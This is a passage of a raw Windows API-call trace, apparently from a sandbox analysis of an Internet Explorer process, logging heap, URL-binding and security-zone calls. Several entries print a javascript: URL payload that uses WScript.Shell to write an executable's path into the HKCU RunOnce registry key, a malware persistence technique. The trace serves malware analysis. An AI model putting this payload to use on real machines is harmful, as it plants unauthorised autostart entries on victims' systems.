Size=0x40) returned 0x7b46c0 [0074.317] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x7c6790 [0074.317] malloc (_Size=0x204) returned 0x2b53a20 [0074.318] ??2@YAPAXI@Z () returned 0x2b53c30 [0074.318] ??2@YAPAXI@Z () returned 0x2b53cb0 [0074.318] GetCurrentThreadId () returned 0x544 [0074.318] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.318] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b4708 [0074.319] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.319] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x7c3d40 [0074.319] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c6440 [0074.319] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b4750 [0074.319] SetTimer (hWnd=0x20280, nIDEvent=0x2000, uElapse=0xa, lpTimerFunc=0x0) returned 0x2000 [0074.319] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0074.320] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0074.582] GetCurrentThreadId () returned 0x544 [0074.582] GetCurrentThreadId () returned 0x544 [0074.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0074.583] ??3@YAXPAX@Z () returned 0x1 [0074.583] free (_Block=0x2b511b0) [0074.583] GetCurrentThreadId () returned 0x544 [0074.583] GetCurrentThreadId () returned 0x544 [0074.584] GetProcAddress (hModule=0x76e40000, lpProcName=0x93) returned 0x76e44c28 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7c3d60 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c6458 [0074.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="7955381", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x9) returned 0x7c6470 [0074.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="7955381", cchWideChar=-1, lpMultiByteStr=0x7c6470, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7955381", lpUsedDefaultChar=0x0) returned 8 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7c3d80 [0074.585] GetProcessHeap () returned 0x760000 [0074.585] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2ce8 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c6458 | out: hHeap=0x760000) returned 1 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c6470 | out: hHeap=0x760000) returned 1 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c4a98 | out: hHeap=0x760000) returned 1 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3d60 | out: hHeap=0x760000) returned 1 [0074.586] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7abf68, cb=0x800, pcbRead=0x33f48c | out: pv=0x7abf68, pcbRead=0x33f48c*=0x8) returned 0x0 [0074.586] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7abf70, cb=0x7f8, pcbRead=0x33f48c | out: pv=0x7abf70, pcbRead=0x33f48c*=0x0) returned 0x1 [0074.587] IBindStatusCallback:OnProgress (This=0x7a28c0, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, szStatusText="text/html") returned 0x0 [0074.587] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.WINSOCK_ACTIVITY") returned 0xc0f7 [0074.587] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.SET_CONNECTOID_NAME") returned 0xc0f6 [0074.588] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.IEXPLORER_EXITING") returned 0xc0fb [0074.588] FindWindowW (lpClassName="MS_AutodialMonitor", lpWindowName=0x0) returned 0x0 [0074.588] FindWindowW (lpClassName="MS_WebCheckMonitor", lpWindowName=0x0) returned 0x1014c [0074.588] PostMessageW (hWnd=0x1014c, Msg=0xc0f7, wParam=0x0, lParam=0x0) returned 1 [0074.588] IBindCtx:GetObjectParam (in: This=0x7a08d0, pszKey="__DWNBINDINFO", ppunk=0x33f3b4 | out: ppunk=0x33f3b4*=0x0) returned 0x80004005 [0074.588] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc166 [0074.588] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc122 [0074.588] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc190 [0074.588] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc176 [0074.588] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc178 [0074.588] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc177 [0074.588] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc17c [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc17d [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc17e [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc180 [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc17f [0074.589] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc182 [0074.589] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc183 [0074.589] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc184 [0074.589] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc191 [0074.589] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc192 [0074.589] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc17a [0074.589] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc17b [0074.589] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc181 [0074.589] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x7c3de0 [0074.589] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.589] StrCmpNICW (lpStr1="text/htm", lpStr2="text/css", nChar=8) returned 5 [0074.589] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7a9a30, cb=0x1ff8, pcbRead=0x33f5a8 | out: pv=0x7a9a30, pcbRead=0x33f5a8*=0x0) returned 0x1 [0074.589] IBindStatusCallback:OnProgress (This=0x7a28c0, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x4, szStatusText="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0074.589] GetCurrentThreadId () returned 0x544 [0074.589] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1fc) returned 0x7a5750 [0074.590] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.590] MulDiv (nNumber=8, nNumerator=4000, nDenominator=8) returned 4000 [0074.590] PostMessageW (hWnd=0x20280, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0074.590] IUnknown:QueryInterface (in: This=0x7a2f28, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f548 | out: ppvObject=0x33f548*=0x0) returned 0x80004002 [0074.590] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f534 | out: ppvObject=0x33f534*=0x0) returned 0x80004002 [0074.590] IBindStatusCallback:OnProgress (This=0x7a28c0, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x6, szStatusText="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0074.590] GetCurrentThreadId () returned 0x544 [0074.590] IInternetProtocol:LockRequest (This=0x7abedc, dwOptions=0x0) returned 0x0 [0074.590] IBindStatusCallback:RemoteOnDataAvailable (This=0x7a28c0, grfBSCF=0x5, dwSize=0x8, pFormatetc=0x7aba44, pStgmed=0x78bc40) returned 0x0 [0074.590] IUnknown:QueryInterface (in: This=0x7a2f28, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e150 | out: ppvObject=0x33e150*=0x0) returned 0x80004002 [0074.590] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e108 | out: ppvObject=0x33e108*=0x0) returned 0x80004002 [0074.591] IUnknown:QueryInterface (in: This=0x7a2f28, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e148 | out: ppvObject=0x33e148*=0x0) returned 0x80004002 [0074.591] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e108 | out: ppvObject=0x33e108*=0x0) returned 0x80004002 [0074.591] GetCurrentThreadId () returned 0x544 [0074.591] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5958 [0074.591] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x7c9f80 [0074.591] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c6488 [0074.692] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/html", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0074.692] GetCurrentThreadId () returned 0x544 [0074.693] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200c) returned 0x7ca0b0 [0074.693] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7ca0c4, cb=0x1ff8, pcbRead=0x33f464 | out: pv=0x7ca0c4, pcbRead=0x33f464*=0x0) returned 0x1 [0074.693] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7ca0c4, cb=0x1ff8, pcbRead=0x33f464 | out: pv=0x7ca0c4, pcbRead=0x33f464*=0x0) returned 0x1 [0074.693] GetCurrentThreadId () returned 0x544 [0074.694] GetCurrentThreadId () returned 0x544 [0074.694] SetEvent (hEvent=0x164) returned 1 [0074.696] IBindStatusCallback:OnStopBinding (This=0x7a28c0, hresult=0x0, szError=0x0) returned 0x0 [0074.696] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.696] IBinding:RemoteGetBindResult (in: This=0x7a2f28, pclsidProtocol=0x33f580, pdwResult=0x33f570, pszResult=0x33f564, dwReserved=0x0 | out: pclsidProtocol=0x33f580*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x33f570*=0x0, pszResult=0x33f564*=0x0) returned 0x0 [0074.696] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f57c | out: pdwScheme=0x33f57c*=0xf) returned 0x0 [0074.696] GetCurrentThreadId () returned 0x544 [0074.696] GetCurrentThreadId () returned 0x544 [0074.696] SetEvent (hEvent=0x164) returned 1 [0074.697] CoTaskMemFree (pv=0x0) [0074.697] IInternetProtocolRoot:Terminate (This=0x7abedc, dwOptions=0x0) returned 0x0 [0074.697] IUnknown:Release (This=0x7a9718) returned 0x4 [0074.697] ReleaseBindInfo (pbindinfo=0x7abf00) [0074.697] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0074.697] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0074.697] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0074.697] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0074.697] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0074.697] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0074.697] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x33df74 | out: ppURI=0x33df74*=0x78c78c) returned 0x0 [0074.698] IUnknown:QueryInterface (in: This=0x78c78c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33df4c | out: ppvObject=0x33df4c*=0x78c78c) returned 0x0 [0074.698] IUnknown:Release (This=0x78c78c) returned 0x4 [0074.698] IUnknown:AddRef (This=0x78c78c) returned 0x5 [0074.698] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1fc) returned 0x7a5b60 [0074.698] IUnknown:Release (This=0x78c78c) returned 0x4 [0074.698] IUnknown:Release (This=0x78c78c) returned 0x3 [0074.698] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x100) returned 0x7cd1e8 [0074.698] FindResourceW (hModule=0x73710000, lpName=0x1fe, lpType=0x6) returned 0x2f084d0 [0074.698] LoadResource (hModule=0x73710000, hResInfo=0x2f084d0) returned 0x2f2e53c [0074.698] LockResource (hResData=0x2f2e53c) returned 0x2f2e53c [0074.698] VirtualQuery (in: lpAddress=0x2f2e53c, lpBuffer=0x33f11c, dwLength=0x1c | out: lpBuffer=0x33f11c*(BaseAddress=0x2f2e000, AllocationBase=0x2c50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0074.698] SizeofResource (hModule=0x73710000, hResInfo=0x2f084d0) returned 0xe6 [0074.817] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5d68 [0074.817] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cd1e8 | out: hHeap=0x760000) returned 1 [0074.817] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x300) returned 0x7cd1e8 [0074.817] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5d68 | out: hHeap=0x760000) returned 1 [0074.817] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5b60 | out: hHeap=0x760000) returned 1 [0074.817] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7cd1e8, Size=0x21a) returned 0x7cd1e8 [0074.817] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x21e) returned 0x7cd410 [0074.818] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f2d8 | out: ppu=0x33f2d8) returned 0x0 [0074.818] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.818] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.818] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.818] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x7a9258 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a37b0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c64a0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x7a9288 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3808 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x68) returned 0x7c68c0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x7afbe0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3860 [0074.819] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c68c0 | out: hHeap=0x760000) returned 1 [0074.819] GetSystemDefaultLCID () returned 0x409 [0074.819] GetVersionExW (in: lpVersionInformation=0x33f1a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x750296a4, dwMinorVersion=0x760174, dwBuildNumber=0x794ec0, dwPlatformId=0x760000, szCSDVersion="梸|") | out: lpVersionInformation=0x33f1a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.819] GetKeyboardLayoutList (in: nBuff=32, lpList=0x33f128 | out: lpList=0x33f128) returned 1 [0074.876] GetSystemMetrics (nIndex=4096) returned 0 [0074.876] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0074.876] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0074.876] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0074.876] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0074.876] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0074.876] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0074.876] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0074.876] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2c) returned 0x7afba8 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a38b8 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x64) returned 0x7c68c0 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x24) returned 0x7a92b8 [0074.876] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c68c0 | out: hHeap=0x760000) returned 1 [0074.876] SetTimer (hWnd=0x302a0, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.090] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c64b8 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78b940 | out: hHeap=0x760000) returned 1 [0075.090] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.090] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0075.090] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f294, dwFlags=0x0 | out: pdwZone=0x33f294*=0xffffffff) returned 0x800c0011 [0075.091] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.091] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.091] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0075.091] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x2106, pPolicy=0x33f298, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f298*=0x0) returned 0x0 [0075.091] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x100) returned 0x7cd638 [0075.092] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.092] RedrawWindow (hWnd=0x302a0, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c64a0 | out: hHeap=0x760000) returned 1 [0075.369] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x79b868, Size=0x22) returned 0x79b868 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78ce40 | out: hHeap=0x760000) returned 1 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c64b8 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8d00 | out: hHeap=0x760000) returned 1 [0075.370] GetCurrentThreadId () returned 0x544 [0075.370] IUnknown:Release (This=0x7a2f28) returned 0x0 [0075.370] IInternetProtocol:UnlockRequest (This=0x7abedc) returned 0x0 [0075.370] IUnknown:Release (This=0x7abec8) returned 0x0 [0075.370] GetProcessHeap () returned 0x760000 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b2ce8 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3d80 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5548 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7abec8 | out: hHeap=0x760000) returned 1 [0075.371] RevokeBindStatusCallback (pBC=0x7a08d0, pBSCb=0x7a28c0) returned 0x0 [0075.371] IUnknown:Release (This=0x7a28c4) returned 0x4 [0075.371] IUnknown:Release (This=0x7a28c0) returned 0x3 [0075.371] IUnknown:Release (This=0x7a08d0) returned 0x0 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79dbd8 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790a18 | out: hHeap=0x760000) returned 1 [0075.371] IUnknown:Release (This=0x78ca14) returned 0xa [0075.371] IUnknown:Release (This=0x78ca14) returned 0x9 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cc0c8 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7ac770 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x8 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x7 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7ca0b0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x6 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x5 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3de0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a28b0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8d68 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, 